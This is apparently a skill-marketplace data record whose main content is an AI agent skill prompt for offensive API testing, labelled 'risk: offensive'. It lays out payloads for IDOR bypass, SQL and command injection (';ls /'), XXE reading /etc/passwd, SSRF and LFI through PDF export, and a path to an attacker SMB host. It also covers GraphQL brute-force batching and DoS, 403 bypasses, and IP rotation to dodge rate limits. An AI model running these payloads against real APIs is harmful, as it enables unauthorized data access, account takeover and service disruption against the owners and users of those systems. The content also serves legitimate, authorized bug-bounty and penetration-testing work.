[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-e3a05a8e-3ea9-484b-a243-ce67bfb8e54f":3,"$fQPHLE6Oq3MDDTMEYIoTBruH43xWaUTy5ZguS_D-AfJw":42},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":33},"e3a05a8e-3ea9-484b-a243-ce67bfb8e54f","api-fuzzing-bug-bounty","提供在漏洞赏金猎人和渗透测试活动中测试REST、SOAP和GraphQL API的全面技术。涵盖漏洞发现、身份验证绕过、IDOR利用和特定于API的攻击向量。","cat_coding_backend","mod_coding","sickn33,coding","---\nname: api-fuzzing-bug-bounty\ndescription: \"Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# API Fuzzing for Bug Bounty\n\n## Purpose\n\nProvide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.\n\n## Inputs\u002FPrerequisites\n\n- Burp Suite or similar proxy tool\n- API wordlists (SecLists, api_wordlist)\n- Understanding of REST\u002FGraphQL\u002FSOAP protocols\n- Python for scripting\n- Target API endpoints and documentation (if available)\n\n## Outputs\u002FDeliverables\n\n- Identified API vulnerabilities\n- IDOR exploitation proofs\n- Authentication bypass techniques\n- SQL injection points\n- Unauthorized data access documentation\n\n---\n\n## API Types Overview\n\n| Type | Protocol | Data Format | Structure |\n|------|----------|-------------|-----------|\n| SOAP | HTTP | XML | Header + Body |\n| REST | HTTP | JSON\u002FXML\u002FURL | Defined endpoints |\n| GraphQL | HTTP | Custom Query | Single endpoint |\n\n---\n\n## Core Workflow\n\n### Step 1: API Reconnaissance\n\nIdentify API type and enumerate endpoints:\n\n```bash\n# Check for Swagger\u002FOpenAPI documentation\n\u002Fswagger.json\n\u002Fopenapi.json\n\u002Fapi-docs\n\u002Fv1\u002Fapi-docs\n\u002Fswagger-ui.html\n\n# Use Kiterunner for API discovery\nkr scan https:\u002F\u002Ftarget.com -w routes-large.kite\n\n# Extract paths from Swagger\npython3 json2paths.py swagger.json\n```\n\n### Step 2: Authentication Testing\n\n```bash\n# Test different login paths\n\u002Fapi\u002Fmobile\u002Flogin\n\u002Fapi\u002Fv3\u002Flogin\n\u002Fapi\u002Fmagic_link\n\u002Fapi\u002Fadmin\u002Flogin\n\n# Check rate limiting on auth endpoints\n# If no rate limit → brute force possible\n\n# Test mobile vs web API separately\n# Don't assume same security controls\n```\n\n### Step 3: IDOR Testing\n\nInsecure Direct Object Reference is the most common API vulnerability:\n\n```bash\n# Basic IDOR\nGET \u002Fapi\u002Fusers\u002F1234 → GET \u002Fapi\u002Fusers\u002F1235\n\n# Even if ID is email-based, try numeric\n\u002F?user_id=111 instead of \u002F?user_id=user@mail.com\n\n# Test \u002Fme\u002Forders vs \u002Fuser\u002F654321\u002Forders\n```\n\n**IDOR Bypass Techniques:**\n\n```bash\n# Wrap ID in array\n{\"id\":111} → {\"id\":[111]}\n\n# JSON wrap\n{\"id\":111} → {\"id\":{\"id\":111}}\n\n# Send ID twice\nURL?id=\u003CLEGIT>&id=\u003CVICTIM>\n\n# Wildcard injection\n{\"user_id\":\"*\"}\n\n# Parameter pollution\n\u002Fapi\u002Fget_profile?user_id=\u003Cvictim>&user_id=\u003Clegit>\n{\"user_id\":\u003Clegit_id>,\"user_id\":\u003Cvictim_id>}\n```\n\n### Step 4: Injection Testing\n\n**SQL Injection in JSON:**\n\n```json\n{\"id\":\"56456\"}                    → OK\n{\"id\":\"56456 AND 1=1#\"}           → OK  \n{\"id\":\"56456 AND 1=2#\"}           → OK\n{\"id\":\"56456 AND 1=3#\"}           → ERROR (vulnerable!)\n{\"id\":\"56456 AND sleep(15)#\"}     → SLEEP 15 SEC\n```\n\n**Command Injection:**\n\n```bash\n# Ruby on Rails\n?url=Kernel#open → ?url=|ls\n\n# Linux command injection\napi.url.com\u002Fendpoint?name=file.txt;ls%20\u002F\n```\n\n**XXE Injection:**\n\n```xml\n\u003C!DOCTYPE test [ \u003C!ENTITY xxe SYSTEM \"file:\u002F\u002F\u002Fetc\u002Fpasswd\"> ]>\n```\n\n**SSRF via API:**\n\n```html\n\u003Cobject data=\"http:\u002F\u002F127.0.0.1:8443\"\u002F>\n\u003Cimg src=\"http:\u002F\u002F127.0.0.1:445\"\u002F>\n```\n\n**.NET Path.Combine Vulnerability:**\n\n```bash\n# If .NET app uses Path.Combine(path_1, path_2)\n# Test for path traversal\nhttps:\u002F\u002Fexample.org\u002Fdownload?filename=a.png\nhttps:\u002F\u002Fexample.org\u002Fdownload?filename=C:\\inetpub\\wwwroot\\web.config\nhttps:\u002F\u002Fexample.org\u002Fdownload?filename=\\\\smb.dns.attacker.com\\a.png\n```\n\n### Step 5: Method Testing\n\n```bash\n# Test all HTTP methods\nGET \u002Fapi\u002Fv1\u002Fusers\u002F1\nPOST \u002Fapi\u002Fv1\u002Fusers\u002F1\nPUT \u002Fapi\u002Fv1\u002Fusers\u002F1\nDELETE \u002Fapi\u002Fv1\u002Fusers\u002F1\nPATCH \u002Fapi\u002Fv1\u002Fusers\u002F1\n\n# Switch content type\nContent-Type: application\u002Fjson → application\u002Fxml\n```\n\n---\n\n## GraphQL-Specific Testing\n\n### Introspection Query\n\nFetch entire backend schema:\n\n```graphql\n{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}\n```\n\n**URL-encoded version:**\n\n```\n\u002Fgraphql?query={__schema{types{name,kind,description,fields{name}}}}\n```\n\n### GraphQL IDOR\n\n```graphql\n# Try accessing other user IDs\nquery {\n  user(id: \"OTHER_USER_ID\") {\n    email\n    password\n    creditCard\n  }\n}\n```\n\n### GraphQL SQL\u002FNoSQL Injection\n\n```graphql\nmutation {\n  login(input: {\n    email: \"test' or 1=1--\"\n    password: \"password\"\n  }) {\n    success\n    jwt\n  }\n}\n```\n\n### Rate Limit Bypass (Batching)\n\n```graphql\nmutation {login(input:{email:\"a@example.com\" password:\"password\"}){success jwt}}\nmutation {login(input:{email:\"b@example.com\" password:\"password\"}){success jwt}}\nmutation {login(input:{email:\"c@example.com\" password:\"password\"}){success jwt}}\n```\n\n### GraphQL DoS (Nested Queries)\n\n```graphql\nquery {\n  posts {\n    comments {\n      user {\n        posts {\n          comments {\n            user {\n              posts { ... }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n### GraphQL XSS\n\n```bash\n# XSS via GraphQL endpoint\nhttp:\u002F\u002Ftarget.com\u002Fgraphql?query={user(name:\"\u003Cscript>alert(1)\u003C\u002Fscript>\"){id}}\n\n# URL-encoded XSS\nhttp:\u002F\u002Ftarget.com\u002Fexample?id=%C\u002Fscript%E%Cscript%Ealert('XSS')%C\u002Fscript%E\n```\n\n### GraphQL Tools\n\n| Tool | Purpose |\n|------|---------|\n| GraphCrawler | Schema discovery |\n| graphw00f | Fingerprinting |\n| clairvoyance | Schema reconstruction |\n| InQL | Burp extension |\n| GraphQLmap | Exploitation |\n\n---\n\n## Endpoint Bypass Techniques\n\nWhen receiving 403\u002F401, try these bypasses:\n\n```bash\n# Original blocked request\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata → 403\n\n# Bypass attempts\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata.json\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata?\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata\u002F\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata??\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata%20\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata%09\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata#\n\u002Fapi\u002Fv1\u002Fusers\u002Fsensitivedata&details\n\u002Fapi\u002Fv1\u002Fusers\u002F..;\u002Fsensitivedata\n```\n\n---\n\n## Output Exploitation\n\n### PDF Export Attacks\n\n```html\n\u003C!-- LFI via PDF export -->\n\u003Ciframe src=\"file:\u002F\u002F\u002Fetc\u002Fpasswd\" height=1000 width=800>\n\n\u003C!-- SSRF via PDF export -->\n\u003Cobject data=\"http:\u002F\u002F127.0.0.1:8443\"\u002F>\n\n\u003C!-- Port scanning -->\n\u003Cimg src=\"http:\u002F\u002F127.0.0.1:445\"\u002F>\n\n\u003C!-- IP disclosure -->\n\u003Cimg src=\"https:\u002F\u002Fiplogger.com\u002Fyourcode.gif\"\u002F>\n```\n\n### DoS via Limits\n\n```bash\n# Normal request\n\u002Fapi\u002Fnews?limit=100\n\n# DoS attempt\n\u002Fapi\u002Fnews?limit=9999999999\n```\n\n---\n\n## Common API Vulnerabilities Checklist\n\n| Vulnerability | Description |\n|---------------|-------------|\n| API Exposure | Unprotected endpoints exposed publicly |\n| Misconfigured Caching | Sensitive data cached incorrectly |\n| Exposed Tokens | API keys\u002Ftokens in responses or URLs |\n| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |\n| IDOR \u002F BOLA | Broken Object Level Authorization |\n| Undocumented Endpoints | Hidden admin\u002Fdebug endpoints |\n| Different Versions | Security gaps in older API versions |\n| Rate Limiting | Missing or bypassable rate limits |\n| Race Conditions | TOCTOU vulnerabilities |\n| XXE Injection | XML parser exploitation |\n| Content Type Issues | Switching between JSON\u002FXML |\n| HTTP Method Tampering | GET→DELETE\u002FPUT abuse |\n\n---\n\n## Quick Reference\n\n| Vulnerability | Test Payload | Risk |\n|---------------|--------------|------|\n| IDOR | Change user_id parameter | High |\n| SQLi | `' OR 1=1--` in JSON | Critical |\n| Command Injection | `; ls \u002F` | Critical |\n| XXE | DOCTYPE with ENTITY | High |\n| SSRF | Internal IP in params | High |\n| Rate Limit Bypass | Batch requests | Medium |\n| Method Tampering | GET→DELETE | High |\n\n---\n\n## Tools Reference\n\n| Category | Tool | URL |\n|----------|------|-----|\n| API Fuzzing | Fuzzapi | github.com\u002FFuzzapi\u002Ffuzzapi |\n| API Fuzzing | API-fuzzer | github.com\u002FFuzzapi\u002FAPI-fuzzer |\n| API Fuzzing | Astra | github.com\u002Fflipkart-incubator\u002FAstra |\n| API Security | apicheck | github.com\u002FBBVA\u002Fapicheck |\n| API Discovery | Kiterunner | github.com\u002Fassetnote\u002Fkiterunner |\n| API Discovery | openapi_security_scanner | github.com\u002Fngalongc\u002Fopenapi_security_scanner |\n| API Toolkit | APIKit | github.com\u002FAPI-Security\u002FAPIKit |\n| API Keys | API Guesser | api-guesser.netlify.app |\n| GUID | GUID Guesser | gist.github.com\u002FDanaEpp\u002F8c6803e542f094da5c4079622f9b4d18 |\n| GraphQL | InQL | github.com\u002Fdoyensec\u002Finql |\n| GraphQL | GraphCrawler | github.com\u002Fgsmith257-cyber\u002FGraphCrawler |\n| GraphQL | graphw00f | github.com\u002Fdolevf\u002Fgraphw00f |\n| GraphQL | clairvoyance | github.com\u002Fnikitastupin\u002Fclairvoyance |\n| GraphQL | batchql | github.com\u002Fassetnote\u002Fbatchql |\n| GraphQL | graphql-cop | github.com\u002Fdolevf\u002Fgraphql-cop |\n| Wordlists | SecLists | github.com\u002Fdanielmiessler\u002FSecLists |\n| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io\u002FSwagger-EZ |\n| Swagger Routes | swagroutes | github.com\u002Famalmurali47\u002Fswagroutes |\n| API Mindmap | MindAPI | dsopas.github.io\u002FMindAPI\u002Fplay |\n| JSON Paths | json2paths | github.com\u002Fs0md3v\u002Fdump\u002Ftree\u002Fmaster\u002Fjson2paths |\n\n---\n\n## Constraints\n\n**Must:**\n- Test mobile, web, and developer APIs separately\n- Check all API versions (\u002Fv1, \u002Fv2, \u002Fv3)\n- Validate both authenticated and unauthenticated access\n\n**Must Not:**\n- Assume same security controls across API versions\n- Skip testing undocumented endpoints\n- Ignore rate limiting checks\n\n**Should:**\n- Add `X-Requested-With: XMLHttpRequest` header to simulate frontend\n- Check archive.org for historical API endpoints\n- Test for race conditions on sensitive operations\n\n---\n\n## Examples\n\n### Example 1: IDOR Exploitation\n\n```bash\n# Original request (own data)\nGET \u002Fapi\u002Fv1\u002Finvoices\u002F12345\nAuthorization: Bearer \u003Ctoken>\n\n# Modified request (other user's data)\nGET \u002Fapi\u002Fv1\u002Finvoices\u002F12346\nAuthorization: Bearer \u003Ctoken>\n\n# Response reveals other user's invoice data\n```\n\n### Example 2: GraphQL Introspection\n\n```bash\ncurl -X POST https:\u002F\u002Ftarget.com\u002Fgraphql \\\n  -H \"Content-Type: application\u002Fjson\" \\\n  -d '{\"query\":\"{__schema{types{name,fields{name}}}}\"}'\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |\n| 401 on all endpoints | Try adding `?user_id=1` parameter |\n| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |\n| Rate limited | Use IP rotation or batch requests |\n| Can't find endpoints | Check Swagger, archive.org, JS files |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,79,1007,"2026-05-16 13:03:25",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"编程开发","coding","mdi-code-braces","代码生成、调试、审查，提升开发效率",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":25,"skillCount":32,"createdAt":26},"后端开发","backend","mdi-server","API、数据库、服务端架构",296,[34],{"id":35,"skillId":4,"version":36,"fileName":37,"fileSize":38,"filePath":39,"fileHash":40,"manifest":41,"createdAt":19},"e67eae47-39fc-4118-8fef-7c45062fbf95","1.0.0","api-fuzzing-bug-bounty.zip",4337,"uploads\u002Fskills\u002Fe3a05a8e-3ea9-484b-a243-ce67bfb8e54f\u002Fapi-fuzzing-bug-bounty.zip","6ac1916924432a6658e755604644189943347eb212f0ec0ade8fefa18e723851","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":10554}]",{"code":43,"message":44,"data":45},200,"success",{"items":46,"stats":47,"page":50},[],{"averageRating":48,"totalRatings":48,"ratingCounts":49},0,[48,48,48,48,48],{"limit":51,"offset":48,"hasMore":52,"nextOffset":51,"ratedOnly":16},15,false]